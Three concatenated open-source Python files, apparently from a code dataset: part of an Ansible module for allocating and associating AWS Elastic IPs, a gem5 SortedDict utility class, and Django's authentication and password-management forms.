ip: 93.184.216.119
state: absent
- name: disassociate an elastic IP with a device
ec2_eip:
device_id: eni-c8ad70f3
ip: 93.184.216.119
state: absent
- name: allocate a new elastic IP and associate it with an instance
ec2_eip:
device_id: i-1212f003
- name: allocate a new elastic IP without associating it to anything
ec2_eip:
state: present
register: eip
- name: output the IP
debug:
msg: "Allocated IP is {{ eip.public_ip }}"
- name: another way of allocating an elastic IP without associating it to anything
ec2_eip:
state: 'present'
- name: provision new instances with ec2
ec2:
keypair: mykey
instance_type: c1.medium
image: ami-40603AD1
wait: yes
group: webserver
count: 3
register: ec2
- name: associate new elastic IPs with each of the instances
ec2_eip:
device_id: "{{ item }}"
with_items: "{{ ec2.instance_ids }}"
- name: allocate a new elastic IP inside a VPC in us-west-2
ec2_eip:
region: us-west-2
in_vpc: yes
register: eip
- name: output the IP
debug:
msg: "Allocated IP inside a VPC is {{ eip.public_ip }}"
'''
try:
import boto.ec2
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
class EIPException(Exception):
pass
def associate_ip_and_device(ec2, address, private_ip_address, device_id, check_mode, isinstance=True):
if address_is_associated_with_device(ec2, address, device_id, isinstance):
return {'changed': False}
# If we're in check mode, nothing else to do
if not check_mode:
if isinstance:
if address.domain == "vpc":
res = ec2.associate_address(device_id, allocation_id=address.allocation_id, private_ip_address=private_ip_address)
else:
res = ec2.associate_address(device_id, public_ip=address.public_ip, private_ip_address=private_ip_address)
else:
res = ec2.associate_address(network_interface_id=device_id, allocation_id=address.allocation_id, private_ip_address=private_ip_address)
if not res:
raise EIPException('association failed')
return {'changed': True}
def disassociate_ip_and_device(ec2, address, device_id, check_mode, isinstance=True):
if not address_is_associated_with_device(ec2, address, device_id, isinstance):
return {'changed': False}
# If we're in check mode, nothing else to do
if not check_mode:
if address.domain == 'vpc':
res = ec2.disassociate_address(
association_id=address.association_id)
else:
res = ec2.disassociate_address(public_ip=address.public_ip)
if not res:
raise EIPException('disassociation failed')
return {'changed': True}
def _find_address_by_ip(ec2, public_ip):
try:
return ec2.get_all_addresses([public_ip])[0]
except boto.exception.EC2ResponseError as e:
if "Address '{}' not found.".format(public_ip) not in e.message:
raise
def _find_address_by_device_id(ec2, device_id, isinstance=True):
if isinstance:
addresses = ec2.get_all_addresses(None, {'instance-id': device_id})
else:
addresses = ec2.get_all_addresses(None, {'network-interface-id': device_id})
if addresses:
return addresses[0]
def find_address(ec2, public_ip, device_id, isinstance=True):
""" Find an existing Elastic IP address """
if public_ip:
return _find_address_by_ip(ec2, public_ip)
elif device_id and isinstance:
return _find_address_by_device_id(ec2, device_id)
elif device_id:
return _find_address_by_device_id(ec2, device_id, isinstance=False)
def address_is_associated_with_device(ec2, address, device_id, isinstance=True):
""" Check if the elastic IP is currently associated with the device """
address = ec2.get_all_addresses(address.public_ip)
if address:
if isinstance:
return address and address[0].instance_id == device_id
else:
return address and address[0].network_interface_id == device_id
return False
def allocate_address(ec2, domain, reuse_existing_ip_allowed):
""" Allocate a new elastic IP address (when needed) and return it """
if reuse_existing_ip_allowed:
domain_filter = {'domain': domain or 'standard'}
all_addresses = ec2.get_all_addresses(filters=domain_filter)
if domain == 'vpc':
unassociated_addresses = [a for a in all_addresses
if not a.association_id]
else:
unassociated_addresses = [a for a in all_addresses
if not a.instance_id]
if unassociated_addresses:
return unassociated_addresses[0]
return ec2.allocate_address(domain=domain)
def release_address(ec2, address, check_mode):
""" Release a previously allocated elastic IP address """
# If we're in check mode, nothing else to do
if not check_mode:
if not address.release():
raise EIPException('release failed')
return {'changed': True}
def find_device(ec2, module, device_id, isinstance=True):
""" Attempt to find the EC2 instance and return it """
if isinstance:
try:
reservations = ec2.get_all_reservations(instance_ids=[device_id])
except boto.exception.EC2ResponseError as e:
module.fail_json(msg=str(e))
if len(reservations) == 1:
instances = reservations[0].instances
if len(instances) == 1:
return instances[0]
else:
try:
interfaces = ec2.get_all_network_interfaces(network_interface_ids=[device_id])
except boto.exception.EC2ResponseError as e:
module.fail_json(msg=str(e))
if len(interfaces) == 1:
return interfaces[0]
raise EIPException("could not find instance" + device_id)
def ensure_present(ec2, module, domain, address, private_ip_address, device_id,
reuse_existing_ip_allowed, check_mode, isinstance=True):
changed = False
# Return the EIP object since we've been given a public IP
if not address:
if check_mode:
return {'changed': True}
address = allocate_address(ec2, domain, reuse_existing_ip_allowed)
changed = True
if device_id:
# Allocate an IP for instance since no public_ip was provided
if isinstance:
instance = find_device(ec2, module, device_id)
if reuse_existing_ip_allowed:
if instance.vpc_id and len(instance.vpc_id) > 0 and domain is None:
raise EIPException("You must set 'in_vpc' to true to associate an instance with an existing ip in a vpc")
# Associate address object (provided or allocated) with instance
assoc_result = associate_ip_and_device(ec2, address, private_ip_address, device_id,
check_mode)
else:
instance = find_device(ec2, module, device_id, isinstance=False)
# Associate address object (provided or allocated) with instance
assoc_result = associate_ip_and_device(ec2, address, private_ip_address, device_id,
check_mode, isinstance=False)
if instance.vpc_id:
domain = 'vpc'
changed = changed or assoc_result['changed']
return {'changed': changed, 'public_ip': address.public_ip, 'allocation_id': address.allocation_id}
def ensure_absent(ec2, domain, address, device_id, check_mode, isinstance=True):
if not address:
return {'changed': False}
# disassociating address from instance
if device_id:
if isinstance:
return disassociate_ip_and_device(ec2, address, device_id,
check_mode)
else:
return disassociate_ip_and_device(ec2, address, device_id,
check_mode, isinstance=False)
# releasing address
else:
return release_address(ec2, address, check_mode)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
device_id=dict(required=False, aliases=['instance_id']),
public_ip=dict(required=False, aliases=['ip']),
state=dict(required=False, default='present',
choices=['present', 'absent']),
in_vpc=dict(required=False, type='bool', default=False),
reuse_existing_ip_allowed=dict(required=False, type='bool',
default=False),
release_on_disassociation=dict(required=False, type='bool', default=False),
wait_timeout=dict(default=300),
private_ip_address=dict(required=False, default=None, type='str')
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
ec2 = ec2_connect(module)
device_id = module.params.get('device_id')
instance_id = module.params.get('instance_id')
public_ip = module.params.get('public_ip')
private_ip_address = module.params.get('private_ip_address')
state = module.params.get('state')
in_vpc = module.params.get('in_vpc')
domain = 'vpc' if in_vpc else None
reuse_existing_ip_allowed = module.params.get('reuse_existing_ip_allowed')
release_on_disassociation = module.params.get('release_on_disassociation')
# Parameter checks
if private_ip_address is not None and device_id is None:
module.fail_json(msg="parameters are required together: ('device_id', 'private_ip_address')")
if instance_id:
warnings = ["instance_id is no longer used, please use device_id going forward"]
is_instance = True
device_id = instance_id
else:
if device_id and device_id.startswith('i-'):
is_instance = True
elif device_id:
if device_id.startswith('eni-') and not in_vpc:
module.fail_json(msg="If you are specifying an ENI, in_vpc must be true")
is_instance = False
try:
if device_id:
address = find_address(ec2, public_ip, device_id, isinstance=is_instance)
else:
address = False
if state == 'present':
if device_id:
result = ensure_present(ec2, module, domain, address, private_ip_address, device_id,
reuse_existing_ip_allowed, module.check_mode, isinstance=is_instance)
else:
address = allocate_address(ec2, domain, reuse_existing_ip_allowed)
result = {'changed': True, 'public_ip': address.public_ip, 'allocation_id': address.allocation_id}
else:
if device_id:
disassociated = ensure_absent(ec2, domain, address, device_id, module.check_mode, isinstance=is_instance)
if release_on_disassociation and disassociated['changed']:
released = release_address(ec2, address, module.check_mode)
result = {'changed': True, 'disassociated': disassociated, 'released': released}
else:
result = {'changed': disassociated['changed'], 'disassociated': disassociated, 'released': {'changed': False}}
else:
address = find_address(ec2, public_ip, None)
released = release_address(ec2, address, module.check_mode)
result = {'changed': released['changed'], 'disassociated': {'changed': False}, 'released': released}
except (boto.exception.EC2ResponseError, EIPException) as e:
module.fail_json(msg=str(e))
if instance_id:
result['warnings'] = warnings
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import * # noqa
from ansible.module_utils.ec2 import * # noqa
if __name__ == '__main__':
main()
|
samueldotj/TeeRISC-Simulator
|
refs/heads/master
|
src/python/m5/util/sorteddict.py
|
84
|
# Copyright (c) 2006-2009 Nathan Binkert <nate@binkert.org>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bisect import bisect_left, bisect_right
class SortedDict(dict):
def _get_sorted(self):
return getattr(self, '_sorted', sorted)
def _set_sorted(self, val):
self._sorted = val
self._del_keys()
sorted = property(_get_sorted, _set_sorted)
@property
def _keys(self):
try:
return self._sorted_keys
except AttributeError:
_sorted_keys = self.sorted(dict.iterkeys(self))
self._sorted_keys = _sorted_keys
return _sorted_keys
def _left_eq(self, key):
index = self._left_ge(key)
if self._keys[index] != key:
raise KeyError(key)
return index
def _right_eq(self, key):
index = self._right_le(key)
if self._keys[index] != key:
raise KeyError(key)
return index
def _right_lt(self, key):
index = bisect_left(self._keys, key)
if index:
return index - 1
raise KeyError(key)
def _right_le(self, key):
index = bisect_right(self._keys, key)
if index:
return index - 1
raise KeyError(key)
def _left_gt(self, key):
index = bisect_right(self._keys, key)
if index != len(self._keys):
return index
raise KeyError(key)
def _left_ge(self, key):
index = bisect_left(self._keys, key)
if index != len(self._keys):
return index
raise KeyError(key)
def _del_keys(self):
try:
del self._sorted_keys
except AttributeError:
pass
def __repr__(self):
return 'SortedDict({%s})' % ', '.join('%r: %r' % item
for item in self.iteritems())
def __setitem__(self, key, item):
dict.__setitem__(self, key, item)
self._del_keys()
def __delitem__(self, key):
dict.__delitem__(self, key)
self._del_keys()
def clear(self):
dict.clear(self)
self._del_keys()
def copy(self):
t = type(self)
return t(self)
def keys(self):
return self._keys[:]
def values(self):
return list(self.itervalues())
def items(self):
return list(self.iteritems())
def iterkeys(self):
return iter(self._keys)
def itervalues(self):
for k in self._keys:
yield self[k]
def iteritems(self):
for k in self._keys:
yield k, self[k]
def keyrange(self, start=None, end=None, inclusive=False):
if start is not None:
start = self._left_ge(start)
if end is not None:
if inclusive:
end = self._right_le(end)
else:
end = self._right_lt(end)
end += 1 # slice ends are exclusive, so step past the last included index
return iter(self._keys[start:end])
def valuerange(self, *args, **kwargs):
for k in self.keyrange(*args, **kwargs):
yield self[k]
def itemrange(self, *args, **kwargs):
for k in self.keyrange(*args, **kwargs):
yield k, self[k]
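# Illustrative semantics: with keys ['a', 'b', 'c', 'd'], keyrange('b', 'd')
# yields 'b', 'c' while keyrange('b', 'd', inclusive=True) also yields 'd'.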
def update(self, *args, **kwargs):
dict.update(self, *args, **kwargs)
self._del_keys()
def setdefault(self, key, _failobj=None):
try:
return self[key]
except KeyError:
self[key] = _failobj
return _failobj
def pop(self, key, *args):
try:
result = dict.pop(self, key)
self._del_keys()
return result
except KeyError:
if not args:
raise
return args[0]
def popitem(self):
try:
key = self._keys[0]
self._del_keys()
except IndexError:
raise KeyError('popitem(): dictionary is empty')
else:
return key, dict.pop(self, key)
@classmethod
def fromkeys(cls, seq, value=None):
d = cls()
for key in seq:
d[key] = value
return d
if __name__ == '__main__':
def display(d):
print d
print d.keys()
print list(d.iterkeys())
print d.values()
print list(d.itervalues())
print d.items()
print list(d.iteritems())
d = SortedDict(x=24,e=5,j=4,b=2,z=26,d=4)
display(d)
print 'popitem', d.popitem()
display(d)
print 'pop j'
d.pop('j')
display(d)
d.setdefault('a', 1)
d.setdefault('g', 7)
d.setdefault('_')
display(d)
d.update({'b' : 2, 'h' : 8})
display(d)
del d['x']
display(d)
d['y'] = 26
display(d)
print repr(d)
print d.copy()
for k,v in d.itemrange('d', 'z', inclusive=True):
print k,v
|
uiri/pxqz
|
refs/heads/master
|
venv/lib/python2.7/site-packages/django/contrib/auth/forms.py
|
65
|
from django import forms
from django.forms.util import flatatt
from django.template import loader
from django.utils.encoding import smart_str
from django.utils.http import int_to_base36
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.contrib.auth.hashers import UNUSABLE_PASSWORD, is_password_usable, get_hasher
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import get_current_site
UNMASKED_DIGITS_TO_SHOW = 6
mask_password = lambda p: "%s%s" % (p[:UNMASKED_DIGITS_TO_SHOW], "*" * max(len(p) - UNMASKED_DIGITS_TO_SHOW, 0))
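# e.g. mask_password("supersecret") -> "supers*****" (first six characters kept)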
class ReadOnlyPasswordHashWidget(forms.Widget):
def render(self, name, value, attrs):
encoded = value
if not is_password_usable(encoded):
return "None"
final_attrs = self.build_attrs(attrs)
encoded = smart_str(encoded)
if len(encoded) == 32 and '$' not in encoded:
algorithm = 'unsalted_md5'
else:
algorithm = encoded.split('$', 1)[0]
try:
hasher = get_hasher(algorithm)
except ValueError:
summary = "<strong>Invalid password format or unknown hashing algorithm.</strong>"
else:
summary = ""
for key, value in hasher.safe_summary(encoded).iteritems():
summary += "<strong>%(key)s</strong>: %(value)s " % {"key": ugettext(key), "value": value}
return mark_safe("<div%(attrs)s>%(summary)s</div>" % {"attrs": flatatt(final_attrs), "summary": summary})
class ReadOnlyPasswordHashField(forms.Field):
widget = ReadOnlyPasswordHashWidget
def __init__(self, *args, **kwargs):
kwargs.setdefault("required", False)
super(ReadOnlyPasswordHashField, self).__init__(*args, **kwargs)
class UserCreationForm(forms.ModelForm):
"""
A form that creates a user, with no privileges, from the given username and
password.
"""
error_messages = {
'duplicate_username': _("A user with that username already exists."),
'password_mismatch': _("The two password fields didn't match."),
}
username = forms.RegexField(label=_("Username"), max_length=30,
regex=r'^[\w.@+-]+$',
help_text = _("Required. 30 characters or fewer. Letters, digits and "
"@/./+/-/_ only."),
error_messages = {
'invalid': _("This value may contain only letters, numbers and "
"@/./+/-/_ characters.")})
password1 = forms.CharField(label=_("Password"),
widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password confirmation"),
widget=forms.PasswordInput,
help_text = _("Enter the same password as above, for verification."))
class Meta:
model = User
fields = ("username",)
def clean_username(self):
# Since User.username is unique, this check is redundant,
# but it sets a nicer error message than the ORM. See #13147.
username = self.cleaned_data["username"]
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise forms.ValidationError(self.error_messages['duplicate_username'])
def clean_password2(self):
password1 = self.cleaned_data.get("password1", "")
password2 = self.cleaned_data["password2"]
if password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password2
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
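# Illustrative usage with hypothetical data (not part of Django itself):
# form = UserCreationForm({"username": "alice",
# "password1": "s3cret", "password2": "s3cret"})
# if form.is_valid():
# user = form.save()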
class UserChangeForm(forms.ModelForm):
username = forms.RegexField(
label=_("Username"), max_length=30, regex=r"^[\w.@+-]+$",
help_text = _("Required. 30 characters or fewer. Letters, digits and "
"@/./+/-/_ only."),
error_messages = {
'invalid': _("This value may contain only letters, numbers and "
"@/./+/-/_ characters.")})
password = ReadOnlyPasswordHashField(label=_("Password"),
help_text=_("Raw passwords are not stored, so there is no way to see "
"this user's password, but you can change the password "
"using <a href=\"password/\">this form</a>."))
def clean_password(self):
return self.initial["password"]
class Meta:
model = User
def __init__(self, *args, **kwargs):
super(UserChangeForm, self).__init__(*args, **kwargs)
f = self.fields.get('user_permissions', None)
if f is not None:
f.queryset = f.queryset.select_related('content_type')
class AuthenticationForm(forms.Form):
"""
Base class for authenticating users. Extend this to get a form that accepts
username/password logins.
"""
username = forms.CharField(label=_("Username"), max_length=30)
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
error_messages = {
'invalid_login': _("Please enter a correct username and password. "
"Note that both fields are case-sensitive."),
'no_cookies': _("Your Web browser doesn't appear to have cookies "
"enabled. Cookies are required for logging in."),
'inactive': _("This account is inactive."),
}
def __init__(self, request=None, *args, **kwargs):
"""
If request is passed in, the form will validate that cookies are
enabled. Note that the request (a HttpRequest object) must have set a
cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
running this validation.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if username and password:
self.user_cache = authenticate(username=username,
password=password)
if self.user_cache is None:
raise forms.ValidationError(
self.error_messages['invalid_login'])
elif not self.user_cache.is_active:
raise forms.ValidationError(self.error_messages['inactive'])
self.check_for_test_cookie()
return self.cleaned_data
def check_for_test_cookie(self):
if self.request and not self.request.session.test_cookie_worked():
raise forms.ValidationError(self.error_messages['no_cookies'])
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
class PasswordResetForm(forms.Form):
error_messages = {
'unknown': _("That e-mail address doesn't have an associated "
"user account. Are you sure you've registered?"),
'unusable': _("The user account associated with this e-mail "
"address cannot reset the password."),
}
email = forms.EmailField(label=_("E-mail"), max_length=75)
def clean_email(self):
"""
Validates that an active user exists with the given email address.
"""
email = self.cleaned_data["email"]
self.users_cache = User.objects.filter(email__iexact=email,
is_active=True)
if not len(self.users_cache):
raise forms.ValidationError(self.error_messages['unknown'])
if any((user.password == UNUSABLE_PASSWORD)
for user in self.users_cache):
raise forms.ValidationError(self.error_messages['unusable'])
return email
def save(self, domain_override=None,
subject_template_name='registration/password_reset_subject.txt',
email_template_name='registration/password_reset_email.html',
use_https=False, token_generator=default_token_generator,
from_email=None, request=None):
"""
Generates a one-use only link for resetting password and sends to the
user.
"""
from django.core.mail import send_mail
for user in self.users_cache:
if not domain_override:
current_site = get_current_site(request)
site_name = current_site.name
domain = current_site.domain
else:
site_name = domain = domain_override
c = {
'email': user.email,
'domain': domain,
'site_name': site_name,
'uid': int_to_base36(user.id),
'user': user,
'token': token_generator.make_token(user),
'protocol': use_https and 'https' or 'http',
}
subject = loader.render_to_string(subject_template_name, c)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
email = loader.render_to_string(email_template_name, c)
send_mail(subject, email, from_email, [user.email])
class SetPasswordForm(forms.Form):
"""
A form that lets a user set his/her password without entering the
old password.
"""
error_messages = {
'password_mismatch': _("The two password fields didn't match."),
}
new_password1 = forms.CharField(label=_("New password"),
widget=forms.PasswordInput)
new_password2 = forms.CharField(label=_("New password confirmation"),
widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super(SetPasswordForm, self).__init__(*args, **kwargs)
def clean_new_password2(self):
password1 = self.cleaned_data.get('new_password1')
password2 = self.cleaned_data.get('new_password2')
if password1 and password2:
if password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password2
def save(self, commit=True):
self.user.set_password(self.cleaned_data['new_password1'])
if commit:
self.user.save()
return self.user
class PasswordChangeForm(SetPasswordForm):
"""
A form that lets a user change his/her password by entering
their old password.
"""
error_messages = dict(SetPasswordForm.error_messages, **{
'password_incorrect': _("Your old password was entered incorrectly. "
"Please enter it again."),
})
old_password = forms.CharField(label=_("Old password"),
widget=forms.PasswordInput)
def clean_old_password(self):
"""
Validates that the old_password field is correct.
"""
old_password = self.cleaned_data["old_password"]
if not self.user.check_password(old_password):
raise forms.ValidationError(
self.error_messages['password_incorrect'])
return old_password
PasswordChangeForm.base_fields.keyOrder = ['old_password', 'new_password1',
'new_password2']
class AdminPasswordChangeForm(forms.Form):
"""
A form used to change the password of a user in the admin interface.
"""
error_messages = {
'password_mismatch': _("The two password fields didn't match."),
}
password1 = forms.CharField(label=_("Password"),
widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password (again)"),
widget=forms.PasswordInput)
def __init__(self, user, *args, **kwargs):
self.user = user
super(AdminPasswordChangeForm, self).__init__(*args, **kwargs)
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2:
if password1 != password2:
raise forms.ValidationError(
self.error_messages['password_mismatch'])
return password2
def save(self, commit=True):
"""
Saves the new password.
"""
self.user.set_password(self.cleaned_data["password1"])
if commit:
self.user.save()
return self.user
|